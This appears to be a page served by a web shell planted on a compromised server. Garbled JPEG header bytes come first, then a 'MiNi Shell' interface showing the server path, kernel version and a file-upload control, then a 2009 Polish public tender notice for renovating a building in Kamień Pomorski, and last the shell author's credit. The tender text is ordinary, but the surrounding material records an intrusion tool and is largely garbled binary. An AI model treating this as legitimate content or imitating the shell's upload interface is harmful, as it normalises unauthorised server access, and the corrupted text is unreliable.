JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090504/131252-N-2009.html

<p class="kh_header"><b>Kamień Pomorski: Remont budynku położonego przy ul. Wolińskiej 7b w Kamieniu Pomorskim, ze zmianą sposobu użytkowania oraz termomodernizacja budynku.</b><br>
<b>Numer ogłoszenia: 131252 - 2009; data zamieszczenia: 04.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kamieński , ul. Mieszka I 5B, 72-400 Kamień Pomorski, woj. zachodniopomorskie, tel. 091 3823120, faks 091 3823121.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatkamienski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku położonego przy ul. Wolińskiej 7b w Kamieniu Pomorskim, ze zmianą sposobu użytkowania oraz termomodernizacja budynku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu budynku internatu przy ul. Wolińskiej 7b w Kamieniu Pomorskim ze zmianą sposobu użytkowania oraz termomodernizacja budynku.
3.1.	Lokalizacja
Zespół Szkół Ponadgimnazjalnych w Kamieniu Pomorskim budynek internatu z częścią biurowo - administracyjną Powiatu Kamieńskiego i  Powiatowego Inspektoratu Sanitarnego w Kamieniu Pomorskim, działki nr 42/7, 42/8, 46/5, 46/7, 46/9, 46/10, 17/2 obręb nr 6 w Kamieniu Pomorskim.
3.2. Istniejący stan obiektu
Budynek przeznaczony do adaptacji jest częścią kompleksu budowlanego Zespołu Szkół Ponadgimnazjalnych im. Stanisława Staszica w Kamieniu Pomorskim posadowiony na działce nr 46/7. Został wybudowany w latach sześćdziesiątych i oddany do użytku w 1971r. 
Stan techniczny konstrukcji ścian klatek schodowych, stropów i stropodachu bez zastrzeżeń , nie wykazuje spękań i zarysowań. Stolarka drzwiowa i okienna w części przeznaczonej do remontu z racji bardzo długiego okresu używalności jest zniszczona. Posadzki z płytek PCV, lastrica , terakoty są w złym stanie z ubytkami. 
Stropodach płaski pokryty papą, ściany osłonowe ocieplone supremą i otynkowane. Budynek posiada instalację elektryczną aluminiową , wodociągowo - kanalizacyjną, centralnego ogrzewania i odgromową. Nie posiada własnej kotłowni co. 
3.3 Opis adaptacji projektowanej części budynku
Projekt obejmuje adaptację części budynku - internatu - na biura Starostwa Powiatowego i modernizację pomieszczeń piwnicy na: salę konferencyjno-kinową, własną kotłownię gazową, pomieszczenia magazynowo - archiwalne, toalety ogólnodostępne.
Zakres robót:
.	Roboty rozbiórkowe: CPV 45110000-1
- obniżenie posadzek w pomieszczeniach piwnic,
- wyburzenie niektórych ścianek działowych,
- wykucie otworów w ścianach osłonowych i działowych,
- rozebranie posadzek w istniejących sanitariatach z terakoty i lastrica,
- demontaż stolarki drzwiowej i okiennej.
.	Roboty budowlane: CPV 45453000-7, 45430000-0, 45421125-6, 45320000-6,
- drobne roboty murowe,
- roboty tynkarskie,
- roboty posadzkowe,
- roboty ścienne glazurowe, 
- montaż drzwi i okien PCV, 
- wewnętrzne roboty malarskie,
- ocieplenie ścian osłonowych budynku wraz z fundamentami 
- ocieplenie stropodachu metodą pneumatyczną poprzez wdmuchanie przez otwory montażowe granulatu styropianu lub wełny mineralnej,
- elewacja zewnętrzna, 
- zewnętrzne schody wejściowe.
.	Instalacje sanitarne i wod - kan. CPV 45330000-9, 45232410-9
- demontaż starej białej armatury,
- demontaż żeliwnych pionów sanitarnych,
- wykucia otworów pod nową kanalizację,
- montaż rurociągów PCV,
- montaż białej armatury.
- instalacja wodna do wymiany.
.	Instalacje CO wraz z kotłownią. CPV 45331100-7
- kompleksowa wymiana instalacji CO wraz z grzejnikami na rury miedziane, montaż kotła 
kondensacyjnego na potrzeby CO i CWU wraz z pompami i osprzętem - komplet. 
.	Instalacja wentylacji mechanicznej
- obejmuje pomieszczenia: salę konferencyjną w piwnicy i na pierwszym piętrze,
- montaż maszynowni wentylacyjnej, instalacji nawiewnej i wywiewnej.
.	Instalacja elektryczna CPV - 4510000-3
- wymiana instalacji elektrycznej aluminiowej na miedzianą,
- dobudowa rozdzielnicy głównej RG,
- sieć logiczna, 
- oświetlenie terenu,
- ochrona przeciwporażeniowa,

3.4. Szczegółowy opis przedmiotu zamówienia zawiera:
a)	dokumentacja projektowa,
b)	przedmiary robót,
c)	specyfikacja techniczna wykonania i odbioru robót budowlanych w części zawierającej zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.43.10.00-7, 45.31.00.00-3, 45.33.00.00-9, 45.42.11.00-5, 45.44.30.00-4, 45.44.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 140.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Należy wnieść wadium w wysokości 30 000,00 zł, w terminie do dnia 25.05.2009 r. do godz. 12.00.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się wykonawcy, którzy spełniają poniższe warunki:
a)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
b)	udokumentują wykonanie, tj. zakończenie w ciągu ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania co najmniej jednej roboty budowlanej dotyczącej remontu budynku o kubaturze co najmniej 7 500 m3 i wartości co najmniej 2 mln zł.
c)	dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia tj. osobami posiadającymi uprawnienia budowlane niezbędne do wykonania przedmiotu zamówienia tj. pełnienia funkcji kierownika budowy w specjalności konstrukcyjno - budowlanej i kierowników robót w następujących specjalnościach:
1)	- instalacyjnej w zakresie instalacji wodociągowych i kanalizacyjnych,
2)	- instalacyjnej w zakresie instalacji co i gazowych,
3)	- instalacyjnej w zakresie instalacji i urządzeń elektrycznych.

Ww. warunki zostaną uznane za spełnione jeżeli wykonawca złoży w ofercie oświadczenia i  dokumenty wymienione w punkcie 6 niniejszej siwz. Zamawiający będzie oceniał spełnianie warunków metodą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące dokumenty:
a)	oświadczenie wykonawcy potwierdzające, ze spełnia wymagania określone w art. 22 ust 1 ustawy Prawo zamówień publicznych, w tym nie podlega wykluczeniu na podstawie art. 24 ust 1 i 2 Prawa zamówień publicznych - zgodnie z załącznikiem nr 2 do niniejszej siwz.
b)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.,
c)	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotnej społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
d)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 punkty: 4,5,6,7,8 Prawa zamówień publicznych - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 punkt 9 Prawa zamówień publicznych - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
Nie dotyczy osób fizycznych oraz spółek cywilnych składających się z osób fizycznych.


f)	Wykaz robót wykonanych, tj. zakończonych, w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, spełniających warunki określone w punkcie 5b niniejszej siwz, zawierający następujące dane: nazwę, adres i telefon zamawiającego, nazwę i adres budowy, opis wykonanych robót wraz z ich zakresem, terminem rozpoczęcia i zakończenia realizacji robót , wartości zrealizowanych robót.
g)	Dokumenty potwierdzające, ze ww. roboty zostały wykonane należycie, np. referencje.

h)	imiona i nazwiska osób, które będą sprawować odpowiednio funkcję kierownika budowy lub kierowników robót,
i)	kopię uprawnień budowlanych ww. osób,
j)	zaświadczenia z właściwych Izb Samorządu Zawodowego potwierdzające ich przynależność do danej Izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej, aktualnego na dzień składania ofert.


k)	wypełniony formularz oferta - załącznik nr 1 do siwz,
l)	harmonogram rzeczowo - terminowo - finansowy zawierający wszystkie koszty niezbędne do zrealizowania przedmiotu zamówienia z ich podziałem na etapy, które mogą stanowić osobny element odbioru częściowego i uwzględnieniem terminów realizacji każdego z tych elementów, z uwzględnieniem możliwości przeniesienia się zamawiającego do remontowanego budynku w możliwie szybkim terminie. Zamawiający zastrzega sobie prawo do zmiany przedstawionego w ofercie harmonogramu w przypadku zaistnienia rozbieżności w założonym i rzeczywistym terminie rozpoczęcia realizacji zadania.
ł)	kosztorys ofertowy sporządzony zgodnie z punktem 12 niniejszej siwz.
Dokumenty, o których mowa w punkcie 6.5 a, b i c musza być podpisane przez osoby upoważnione do składania oświadczeń woli w imieniu wykonawcy. Jeśli upoważnienie to nie wynika z aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia  o wpisie do ewidencji działalności gospodarczej należy dołączyć stosowne pełnomocnictwo. Pełnomocnictwo takie musi być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez:
-	notariusza lub
-	przez osobę udzielającą pełnomocnictwa lub,
-	przez osobę upoważniona do podpisywania oferty.
m)	dowód wpłaty wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatkamienski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul. Mieszka I 5b
72-400 Kamień Pomorski.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 12:00, miejsce: Starostwo Powiatowe - Kancelaria Ogólna
ul. Mieszka I 5b
72-400 Kamień Pomorski.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com